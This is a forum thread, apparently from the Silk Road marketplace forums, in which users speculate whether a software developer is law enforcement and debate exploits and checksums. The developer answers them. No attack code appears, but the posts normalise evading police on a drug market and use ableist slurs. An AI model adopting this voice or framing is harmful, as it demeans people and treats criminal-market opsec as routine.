These three quotes before shows him contradicting himself. I don't know if this implies anything sinister by itself though, although it does seem odd to me that he wouldn't know how to check if his own software had been modified..I guess he could have been reading it line by line..
Yeah, that's fair enough. Don't worry, though, if someone does try that kind of inverted controlled delivery there's nothing that could result in anti-LE retaliation.
That's just down right creepy. "Don't worry, if the feds want your ass, they can take it and there ain't a damn thing you can do about it." To me that SCREAMS LEO.
Paranoia is just seeing a threat where it doesn't exist, so in this case that's exactly what you are.
Paranoia is recognizing dangers even if other people can't see them, paranoia is everyday reading about feds and cops that will set you up in a heartbeat for anything (especially if you are a smart ass to them), paranoia keeps you alive and free. So long as you don't let it overcome you. There is always a balance to be struck in the natural world, some kind of equilibrium of variables that provides the minimum resistance for whichever process to take place in.
Alright, I'm really tired, I haven't slept in about 36 hours. I hope I didn't leave anything out..so sorry about the length.
tldr: Project Mayhem has begun. :-X lol
not really
Well I hope this is all wrong, but it might not be.
Oh and here is a little fun fact for anyone who's interested:
An anagram for LouisCyphre is: Cop irl? Uh, yes! :o
cop irl uh yes
Doesn't mean anything probably, just interesting..
-
So did any real conclusion come of all this?
-
So did any real conclusion come of all this?
From what I gather there's a huge market for tin foil on here. I'm going to get a vendor account and nip to Tesco.
You shouldn't buy software on here as a general rule (all that needs saying), but all the attacks on this developer are bullshit. Just read the post above yours. Nuts.
-
Hope so
-
So did any real conclusion come of all this?
From what I gather there's a huge market for tin foil on here. I'm going to get a vendor account and nip to Tesco.
You shouldn't buy software on here as a general rule (all that needs saying), but all the attacks on this developer are bullshit. Just read the post above yours. Nuts.
There is nothing crazy about what Tyler is saying. If you read the intelligence documents we've been receiving, you'd not be so lazare faire. Not one little bit.
-
Surely the simple answer to this is not to buy/accept any software from SR. It just seems like a case of common sense. I know absolutely fuck all about I.T so I can't comment on whatever was sent but it just seems like this can be averted by not going anywhere near the situation in the first place.
-
Surely the simple answer to this is not to buy/accept any software from SR. It just seems like a case of common sense. I know absolutely fuck all about I.T so I can't comment on whatever was sent but it just seems like this can be averted by not going anywhere near the situation in the first place.
Yes, exactly.
-
So all this is moot then because only a retard would do it in the first place and given that the splitting of people into retards and non-retards is really just another of natures many forms of natural selection then really, who gives a flying fuck? The idiots who fall into the retard category get caught or burned as they do in all walks of life and the people who aren't retards carry on as usual. Simple. Who cares if LouisCypher is LE or he just acted a bit silly and made himself look bad, if he is the former then he'll only smoke the chaff anyway.
SR maybe a leveler but it's also about survival of the shittest as well, people seem to forget this.
-
So all this is moot then because only a retard would do it in the first place and given that the splitting of people into retards and non-retards is really just another of natures many forms of natural selection then really, who gives a flying fuck? The idiots who fall into the retard category get caught or burned as they do in all walks of life and the people who aren't retards carry on as usual. Simple. Who cares if LouisCypher is LE or he just acted a bit silly and made himself look bad, if he is the former then he'll only smoke the chaff anyway.
SR maybe a leveler but it's also about survival of the shittest as well, people seem to forget this.
Interesting view on things. The simple solution is always the best.
Or use your head ;D
-
Well it just annoying that this thread went on for so long for fuck all reason.
-
pewpew.
-
First, I just wanna say HELLO Louis :)
Second, I want to put a disclaimer on this post: I only just started posting on the SR forums so I realize I don't have any credibility at all. And I am also not saying this is the only possibility, but it could be one of them. I also know very little about coding, I haven't looked into it at all--which is changing now. Yes this is all conjecture, but I enjoy thinking about this kinda stuff.
You definitely needed that caveat, but I enjoy a good conspiracy theory. In this case, I guess one of two ain't bad.
What if instead of going for a straightforward attack on vendors one at a time like might be expected, this is actually the second or third phase of a very elaborate operation. An operation whose sole end goal is to shut down SR in one fell swoop, including the big buyers (maybe the small ones too), vendors, and all the way up to the big cheese, Dread Pirate Roberts himself :o
How? The only ways to get to DPR would be to trace the bitcoins or locating the clearnet IP of the hidden service(s). Infiltrating the forums or selling code to vendors won't do that.
BTW, I offered a copy of the code to DPR if he wanted to vet it. That offer was declined.
Louis could be that individual, of course I cannot know with complete certainty.
No, you don't.
However, there are just so many red flags about this guy and his posts that makes me extremely wary and should make everyone on here think twice about buying his software.
Well, no one's being forced to do anything and I'm sure they'll be as wary as they need to be based on their own threat assessment.
Fourth through Ninth flags are just his posts (not really in any particular order)
Now let's see if an exploit is buried in there. By the way, if that doesn't add up to 545 bytes then it just means there were more blank lines at the end, so add carriage returns (in Vim or Emacs) until it does and then check the SHA sum.
Easily proven wrong with SHA256 checksums. Actually, there's a point, better go and add that for the individual files.
Checksums were considered originally, but as I've stated they only help me to prevent a future possibility of being framed.
These three quotes before shows him contradicting himself. I don't know if this implies anything sinister by itself though, although it does seem odd to me that he wouldn't know how to check if his own software had been modified..I guess he could have been reading it line by line..
Not really.
The code snippet is one of the largest files from version 1.1 of the code. It was posted to demonstrate how lean the code is and how the discussion of planting an exploit in it without notice would be incredibly difficult. Read it in the context of the discussion with Kmf.
The SHA checksums were not originally included because there's only one source of the code (me). Checksums are used to verify that a copy obtained elsewhere actually matches the original source, so that people can safely download from mirror servers.
Since I intended the only source to be myself and each distributed copy would be encrypted and GPG signed by me, I didn't feel the need to include it from the beginning. Once this thread was created I realised the possibility of someone purchasing the software, modifying it to include an exploit and then posting their exploited version. The checksums help me to prove if someone attempts this.
In short, checksums with this distribution model are more for my benefit than end users.
Yeah, that's fair enough. Don't worry, though, if someone does try that kind of inverted controlled delivery there's nothing that could result in anti-LE retaliation.
That's just down right creepy. "Don't worry, if the feds want your ass, they can take it and there ain't a damn thing you can do about it." To me that SCREAMS LEO.
That is not what I said. What I said was that purchasing the software and running it in a secure environment and/or auditing the code (the inverted controlled delivery that Pine proposed with regards to the software), could not produce any kind of tracking. Hence there was nothing that would lead to LE involvement and as a result of *that* there could be no anti-LE retaliation.
Oh and here is a little fun fact for anyone who's interested:
An anagram for LouisCyphre is: Cop irl? Uh, yes! :o
cop irl uh yes
Doesn't mean anything probably, just interesting..
This is my favourite part of the whole post. Pure gold! No, I didn't notice the anagram when I selected the handle. There are actually three reasons for using this name and, in reverse order, they are:
1) The "surname" Cyphre being an alternate spelling of cipher.
2) A certain pharmaceutical with nickname for the first part of the handle.
and 3) How to put this, say the pseudonym out loud. It helps if you shorten "Louis" to "Lou" when you do that. What does that sound like?
I've actually referred to that in one of the guides I posted in the security forum. I think it was the key generation one, but I can't be bothered double-checking.
-
So did any real conclusion come of all this?
Not that I've seen, but expect it to drag on indefinitely.
-
Lol Louis you need to hush mate, you aren't doing yourself any favours.
-
LUCIFER!!!!
666
666
666
666
666
666
666
666
all Christians need to run bitches!!!
/thumbs